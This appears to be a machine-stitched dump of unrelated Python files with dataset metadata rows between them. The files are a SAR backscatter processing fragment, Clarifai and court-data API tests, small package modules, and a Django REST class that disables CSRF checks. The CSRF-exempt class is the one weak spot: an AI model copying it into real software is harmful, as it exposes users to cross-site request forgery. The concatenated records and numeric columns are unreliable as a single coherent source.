h.delDimap(outCal)
# set outRtc to outCal for further processing
outCal = outRtc
# geo code backscatter products
outTc = opj(tmpDir, '{}_BS'.format(fileIdMst))
slc2Ard.slcTC('{}.dim'.format(outCal), outTc, logFile, outResolution)
# move them to the outfolder
shutil.move('{}.data'.format(outTc), opj(outDir, '{}_BS.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outTc), opj(outDir, '{}_BS.dim'.format(fileIdMst)))
# create LS map
outLs = opj(tmpDir, '{}_LS'.format(fileIdMst))
slc2Ard.slcLSMap('{}.dim'.format(outCal), outLs, logFile, outResolution)
# move LS map to out folder
shutil.move('{}.data'.format(outLs), opj(outDir, '{}_LS.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outLs), opj(outDir, '{}_LS.dim'.format(fileIdMst)))
# remove calibrated files
h.delDimap(outCal)
| 36.255952
| 91
| 0.625513
| 670
| 6,091
| 5.638806
| 0.170149
| 0.076231
| 0.075701
| 0.037057
| 0.771043
| 0.744309
| 0.73478
| 0.725781
| 0.725781
| 0.725781
| 0
| 0.00569
| 0.220982
| 6,091
| 168
| 92
| 36.255952
| 0.790516
| 0.145296
| 0
| 0.642857
| 0
| 0
| 0.095837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.27381
| 0
| 0.297619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e054ee4d095976d449c9b29876c1f52d07a2cca8
| 3,309
|
py
|
Python
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 322
|
2015-08-25T03:16:11.000Z
|
2021-11-08T09:36:50.000Z
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 76
|
2015-10-25T13:03:47.000Z
|
2022-02-19T09:36:10.000Z
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 136
|
2015-09-04T13:48:27.000Z
|
2021-06-12T16:48:36.000Z
|
# -*- coding: utf-8 -*-
import logging
import unittest
from clarifai.rest import ClarifaiApp
from . import sample_inputs
class TestPublicModels(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.app = ClarifaiApp(log_level=logging.WARN)
def test_predict_with_apparel_model(self):
res = self.app.public_models.apparel_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_color_mode(self):
res = self.app.public_models.color_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_face_detection_model(self):
res = self.app.public_models.face_detection_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_face_embedding_model(self):
res = self.app.public_models.face_embedding_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_food_model(self):
res = self.app.public_models.food_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_general_embedding_model(self):
res = self.app.public_models.general_embedding_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_general_model(self):
res = self.app.public_models.general_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_landscape_quality_model(self):
res = self.app.public_models.landscape_quality_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_logo_model(self):
res = self.app.public_models.logo_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_moderation_model(self):
res = self.app.public_models.moderation_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_nsfw_model(self):
res = self.app.public_models.nsfw_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_portrait_model(self):
res = self.app.public_models.portrait_quality_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_textures_and_patterns_model(self):
res = self.app.public_models.textures_and_patterns_model.predict_by_url(
url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_travel_model(self):
res = self.app.public_models.travel_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
def test_predict_with_wedding_model(self):
res = self.app.public_models.wedding_model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
self.assertEqual(10000, res['status']['code'])
| 40.353659
| 99
| 0.77395
| 479
| 3,309
| 4.970772
| 0.121086
| 0.080638
| 0.088198
| 0.113398
| 0.829903
| 0.829903
| 0.818984
| 0.688786
| 0.619908
| 0.619908
| 0
| 0.025798
| 0.109701
| 3,309
| 81
| 100
| 40.851852
| 0.782417
| 0.006346
| 0
| 0.355932
| 0
| 0
| 0.045648
| 0
| 0
| 0
| 0
| 0
| 0.254237
| 1
| 0.271186
| false
| 0
| 0.067797
| 0
| 0.355932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e05d9ad51f002ba61b7a8a84f368bbb34514ea09
| 229
|
py
|
Python
|
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
def test_base_agent():
from dream.agent import BaseAgent
agent = BaseAgent()
assert agent.in_game is None
assert agent.run() is None
assert agent.observe() is None
assert agent.act('SOME_ACTION') is None
| 25.444444
| 43
| 0.69869
| 34
| 229
| 4.588235
| 0.529412
| 0.282051
| 0.230769
| 0.326923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218341
| 229
| 8
| 44
| 28.625
| 0.871508
| 0
| 0
| 0
| 0
| 0
| 0.048035
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 1
| 0.142857
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e0742c7e4e9570642476a8034dfc2b12dc6c1b9c
| 102
|
py
|
Python
|
parser/team04/Interpreter/Expression/expression.py
|
mr8ug/tytus
|
a09abe4095e49d333a8ed9ca81cb3d88f90872ba
|
[
"MIT"
] | 1
|
2021-01-09T05:32:35.000Z
|
2021-01-09T05:32:35.000Z
|
parser/team04/Interpreter/Expression/expression.py
|
XiomRB/tytus
|
0873e4bdce5c110bee6ef2aa98240be6a93ae024
|
[
"MIT"
] | null | null | null |
parser/team04/Interpreter/Expression/expression.py
|
XiomRB/tytus
|
0873e4bdce5c110bee6ef2aa98240be6a93ae024
|
[
"MIT"
] | null | null | null |
from Interpreter.node import Node
class Expression(Node):
def getValue(self, env):
pass
| 14.571429
| 33
| 0.686275
| 13
| 102
| 5.384615
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 102
| 6
| 34
| 17
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
0eb3b80d7392ee334641a0123f62b5d8a424f121
| 171
|
py
|
Python
|
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | 3
|
2018-11-30T01:15:19.000Z
|
2021-10-31T19:08:04.000Z
|
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | null | null | null |
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | null | null | null |
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication (SessionAuthentication):
def enforce_csrf(self, request):
return
| 28.5
| 63
| 0.865497
| 15
| 171
| 9.733333
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087719
| 171
| 5
| 64
| 34.2
| 0.935897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
0ec145b06f3645322fbaea01f63bb218a69b6523
| 75
|
py
|
Python
|
xray_ot/__init__.py
|
bdowning/xray-python-opentracing
|
25fc8fc306b6c899ef3f402bc48e310a4ee56cad
|
[
"MIT"
] | 43
|
2016-05-23T11:14:36.000Z
|
2021-10-21T05:43:59.000Z
|
xray_ot/__init__.py
|
bdowning/xray-python-opentracing
|
25fc8fc306b6c899ef3f402bc48e310a4ee56cad
|
[
"MIT"
] | 57
|
2016-04-13T23:04:24.000Z
|
2021-05-13T20:47:42.000Z
|
xray_ot/__init__.py
|
NyanKiyoshi/opentracing-python-xray
|
6d5963c00162b1e849087f82f50e2d1c0ddbe073
|
[
"MIT"
] | 21
|
2016-06-22T21:46:01.000Z
|
2020-08-12T23:16:49.000Z
|
from __future__ import absolute_import
from .tracer import Tracer # noqa
| 18.75
| 38
| 0.813333
| 10
| 75
| 5.6
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 75
| 3
| 39
| 25
| 0.888889
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
161eb693c2c81a38574c6dcf322bc6d1c2baee96
| 4,567
|
py
|
Python
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | 1
|
2022-01-27T14:28:40.000Z
|
2022-01-27T14:28:40.000Z
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | 16
|
2022-01-28T11:01:27.000Z
|
2022-03-30T14:01:11.000Z
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock, patch, PropertyMock
from fastapi.testclient import TestClient
from laa_court_data_api_app.internal.oauth_client import OauthClient
from laa_court_data_api_app.main import app
from laa_court_data_api_app.models.hearing_events.hearing_events_response import HearingEventsResponse
from ..routers.fixtures import *
client = TestClient(app)
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_ok(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=pass")
assert response.status_code == 200
assert mock_cda_client["pass_hearing_events_route"].called
model = HearingEventsResponse(**response.json())
assert model.hearing_id is None
assert model.has_active_hearing is True
assert len(model.events) == 0
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_bad_request(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=fail")
assert response.status_code == 400
assert mock_cda_client["fail_hearing_events_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_not_found(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=notfound")
assert response.status_code == 404
assert mock_cda_client["notfound_hearing_events_uuid_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_server_error(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=exception")
assert response.status_code == 424
assert mock_cda_client["exception_hearing_events_uuid_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_none(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_cda_settings.return_value = CdaSettings(cda_endpoint="https://failed-test-url/", cda_secret="12345",
cda_uid="12345")
mock_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=pass")
assert response.status_code == 424
assert response.content == b''
assert mock_cda_client["failed_token_endpoint"].called
| 50.186813
| 109
| 0.77644
| 579
| 4,567
| 5.704663
| 0.150259
| 0.079927
| 0.063579
| 0.093249
| 0.785347
| 0.778686
| 0.751438
| 0.751438
| 0.739025
| 0.739025
| 0
| 0.037321
| 0.14342
| 4,567
| 90
| 110
| 50.744444
| 0.807004
| 0
| 0
| 0.591549
| 0
| 0
| 0.279834
| 0.272389
| 0
| 0
| 0
| 0
| 0.239437
| 1
| 0.070423
| false
| 0.042254
| 0.084507
| 0
| 0.15493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
162060a26b7a35d8af4f9054874bb9de858a5091
| 298
|
py
|
Python
|
tests_storage/viewsets.py
|
Faunris/apiqa-storage
|
2ee0b204037b3ed6278867f90abd15ae16942d81
|
[
"MIT"
] | 1
|
2021-08-02T10:19:00.000Z
|
2021-08-02T10:19:00.000Z
|
tests_storage/viewsets.py
|
Ivan-Feofanov/apiqa-storage
|
9a0a4353dac3f48adf3025b428d39ab612a9fef9
|
[
"MIT"
] | 2
|
2019-06-13T07:17:56.000Z
|
2020-08-05T12:56:55.000Z
|
tests_storage/viewsets.py
|
Ivan-Feofanov/apiqa-storage
|
9a0a4353dac3f48adf3025b428d39ab612a9fef9
|
[
"MIT"
] | 6
|
2019-12-05T14:58:44.000Z
|
2021-03-07T08:51:14.000Z
|
from rest_framework import viewsets
from .models import ModelWithAttachments
from .serializers import ModelWithAttachmentsSerializer
class ModelWithAttachmentsViewSet(viewsets.ModelViewSet):
serializer_class = ModelWithAttachmentsSerializer
queryset = ModelWithAttachments.objects.all()
| 29.8
| 57
| 0.855705
| 24
| 298
| 10.541667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104027
| 298
| 9
| 58
| 33.111111
| 0.947566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
162dcf10d85673fafd5a2041a5e7229dfad031e7
| 127
|
py
|
Python
|
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | null | null | null |
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | null | null | null |
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | 1
|
2020-08-14T11:52:10.000Z
|
2020-08-14T11:52:10.000Z
|
# This package includes classes that convert SpaCy doc spans to np.array or pandas DataFrame
from .Vectorizer import Vectorizer
| 63.5
| 92
| 0.834646
| 19
| 127
| 5.578947
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141732
| 127
| 2
| 93
| 63.5
| 0.972477
| 0.708661
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
1631093370317ae8cf01fc9a1139dbab5d12ba4d
| 40
|
py
|
Python
|
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | 5
|
2021-02-16T00:01:24.000Z
|
2021-03-08T19:18:49.000Z
|
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | null | null | null |
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | null | null | null |
from .easy_logging import setup_logging
| 20
| 39
| 0.875
| 6
| 40
| 5.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
163271691be1c4ae1aae1b90023915bf5cf08972
| 130
|
py
|
Python
|
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | 1
|
2020-06-21T13:45:26.000Z
|
2020-06-21T13:45:26.000Z
|
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | null | null | null |
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | 3
|
2020-09-02T03:18:45.000Z
|
2021-01-27T08:24:05.000Z
|
version https://git-lfs.github.com/spec/v1
oid sha256:47bf5dc8df375bbeab9d7b1a4d0a3de9022248aae5b331cb7ef10b293b0e0041
size 12998
| 32.5
| 75
| 0.884615
| 13
| 130
| 8.846154
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.354839
| 0.046154
| 130
| 3
| 76
| 43.333333
| 0.572581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
164c03c0255bb2b108870ffd1d426f384e644efc
| 52
|
py
|
Python
|
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | 2
|
2020-09-02T19:40:02.000Z
|
2020-09-02T22:26:05.000Z
|
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | null | null | null |
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | null | null | null |
from Builders.WindowsBuilder import WindowsBuilder
| 17.333333
| 50
| 0.884615
| 5
| 52
| 9.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 52
| 2
| 51
| 26
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
167b0811eeb8c383ee980c190ea1367399717b77
| 41
|
py
|
Python
|
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | null | null | null |
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | null | null | null |
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | 6
|
2020-09-04T10:16:59.000Z
|
2020-12-03T01:47:03.000Z
|
import calendar
calendar.prmonth(2020, 9)
| 20.5
| 25
| 0.829268
| 6
| 41
| 5.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 0.073171
| 41
| 2
| 25
| 20.5
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
16803d089621ca33c03a0e10b9893062cbf4dc07
| 29
|
py
|
Python
|
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
from .image import ImageStore
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
168a0f4de7d08a8c479202ab1b49d83b4b42c038
| 54
|
py
|
Python
|
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 1
|
2018-09-04T09:32:07.000Z
|
2018-09-04T09:32:07.000Z
|
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | null | null | null |
neuroBN/learning/structure/tree/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 2
|
2019-10-03T21:23:09.000Z
|
2020-03-21T11:12:56.000Z
|
from neuroBN.learning.structure.tree.chow_liu import *
| 54
| 54
| 0.851852
| 8
| 54
| 5.625
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 54
| 1
| 54
| 54
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
16a8b863cfd29a44e8df814576310ed2f6b733c2
| 1,414
|
py
|
Python
|
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
marquez_codegen_client/models/__init__.py
|
ashulmanWeWork/marquez-python-client-codegen
|
99f30c78156a5643525dbf6ad4a9ffef329ead10
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# flake8: noqa
"""
Marquez
Marquez is an open source **metadata service** for the **collection**, **aggregation**, and **visualization** of a data ecosystem's metadata. # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
# import models into model package
from marquez_codegen_client.models.create_job import CreateJob
